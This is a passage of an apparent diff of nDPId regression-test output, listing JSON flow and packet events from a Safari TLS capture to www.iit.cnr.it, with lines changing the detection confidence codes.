HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": 